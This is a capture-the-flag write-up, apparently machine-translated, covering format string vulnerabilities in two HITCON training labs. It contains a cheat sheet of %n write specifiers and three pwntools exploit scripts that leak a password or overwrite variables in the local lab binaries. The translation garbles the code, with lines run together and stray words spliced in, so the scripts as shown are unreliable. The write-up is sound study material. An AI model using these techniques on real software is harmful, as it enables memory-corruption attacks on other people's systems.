Pwn-september-hitcon-IV

Directory

• Pwn-september-hitcon-IV
  • Lab7-crack
    • Check protection measures
    • Logical Analysis
  • Lab8-craxme
    • Check protection measures
    • Logical Analysis

Pwn-september-hitcon-IV

The fourth day of hitcon practice ??, Happily learn about the FSB (format string bug) and the format string vulnerability.

Lab7-crack

Okay ??, This topic is exposed to the formatting String Vulnerability.

What is the formatting string vulnerability? We know that C/C ++printfFunction output values need corresponding parameters. However, when the provided parameters are incorrect or no parameters are provided, the formatting string vulnerability may occur. CTF-wiki Portal

Let's assume that when we write a program, we write it as follows:

printf("Color %s, Number %d, Float %4.2f");

At this point, we can find that we do not provide parameters, so how will the program run? The program will run, and the three variables above the stack storage formatted string address will be parsed

1. Parses the string corresponding to the address
2. Parse the integer value corresponding to the content
3. Resolve the floating point value corresponding to the content

It can be seen that the main vulnerabilities in formatting strings are:

• 1. leakage of any address value, leak memory (such as leak out of the libc base address)

• 2. Write any address, which can be used to modify the got table

This part is from icemakr's blog ==> to salute the Big Brother's 32-bit reading '% {}$ x '. format (INDEX) // read 4 bytes '% {} $ P '. format (INDEX) // same as '$ {}$ s '. format (INDEX) Write '% {}$ n '. format (INDEX) // unreference, write four bytes '% {} $ HN '. format (INDEX) // unreference, write two bytes '% {}$ hhn '. format (INDEX) // unreference, write a byte '% {}$ lln '. format (INDEX) // unreference, write eight bytes of 64-bit read '% {}$ x '. format (index, num) // read 4 bytes '% {} $ lx '. format (index, num) // read 8 bytes '% {} $ P '. format (INDEX) // read 8 bytes '$ {} $ s '. format (INDEX) Write '% {}$ n '. format (INDEX) // unreference, write four bytes '% {} $ HN '. format (INDEX) // unreference, write two bytes '% {}$ hhn '. format (INDEX) // unreference, write a byte '% {}$ lln '. format (INDEX) // unreference, write eight bytes % 1 $ lx: RSI % 2 $ lx: RDX % 3 $ lx: rcX % 4 $ lx: r8 % 5 $ lx: R9 % 6 $ lx: The first qword on the stack

Check protection measures

Follow the routine, firstchecksec crack:

We can see that the Canary found and the unexecutable stack (nx) measures are enabled, which clearly allows us to start elsewhere.

Run the following command:

We need to enter two values: name and password.

Master m4x logic:The output name has an obvious formatting string vulnerability. There are many ideas for this question. You can use FSB to rewrite the password, or use leak to output the password, or directly use FSB, hijack puts_got to system ("cat flag") (note that printf actually calls puts).

Logical Analysis

Start idapro !! Start !! Start it for me !!??! Main function:

Exp1: Password leakage through the formatting String Vulnerability

For a simple test, we can see some interesting things, which should beprintfFor the data in the stack, we only need to find the location where the input content is stored in the stack. If an address is entered, the content under the address can be obtained through % s resolution:

We can see the tenth position of the input content in the stack. Here we will learn a little bit,%10$sThe "$" operator of the formatted string, which allows us to select a location parameter from the formatted string as a specific parameter. We can get it from IDApassword_addr=0x804A080And construct exp.

# Coding: utf-8from pwn import * From libnum import n2scontext. log_level = "debug" IO = process ('./crack') pwd_addr = 0x804a048io. recvuntil ('? ') Io. sendline (p32 (pwd_addr) + "| % 10 $ X |") Io. recvuntil ('|') # Drop = true indicates that pattern is discarded and patternpwd = STR (u32 (Io. recvuntil ('|', drop = true) Io. sendlineafter (":", PWD) Io. interactive () Io. close ()

Running effect:

Exp2: Modify Random Number

After a brief understanding of fmtstr, we know that the pwntools module is still so cool. Here we will analyze and understand this exp.

# Expfrom pwn import * context from veritas501. log_level = 'debug' Cn = process ('. /crack ') p_pwd = 0x0804a048fmt_len = 10cn. recv () Pay = fmtstr_payload (fmt_len, {p_pwd: 1}) CN. sendline (Pay) CN. recv () CN. sendline ('1') CN. recv () CN. recv ()

Running effect:

Lab8-craxme

This is also the question of the formatting String Vulnerability ??, We can directly modify the value in a way similar to exp2 above.

Check protection measures

checksec craxme:

We can see that almost all protection measures are enabled, and attacks cannot be carried out through stack overflow or stack execution vulnerabilities.

Logical Analysis

Like lab7, we can see the formatting string vulnerability in IDA:

Let's run it.

We can see that the seventh position in the printf function stack is the input content, so we can use fmtstr_payload of pwntools to change the value of magic.

Find the magic address through IDA:

Through pwntools. Elf:

Exp

#!/usr/bin/env python# -*- coding: utf-8 -*-from pwn import *context.log_level = "debug"magicAddr = ELF("./craxme").sym["magic"]inputs = int(input("[+]1.flag\n[+]2.craxflag\ninput:"))if inputs == 1:    payload = fmtstr_payload(7, {magicAddr: 0xda})else:    payload = fmtstr_payload(7, {magicAddr: 0xfaceb00c})io = process("./craxme")io.sendlineafter(" :", payload)io.interactive()io.close()

Running effect:

The formatting string vulnerability is hard to learn. Why ??.

Pwn-september-hitcon-IV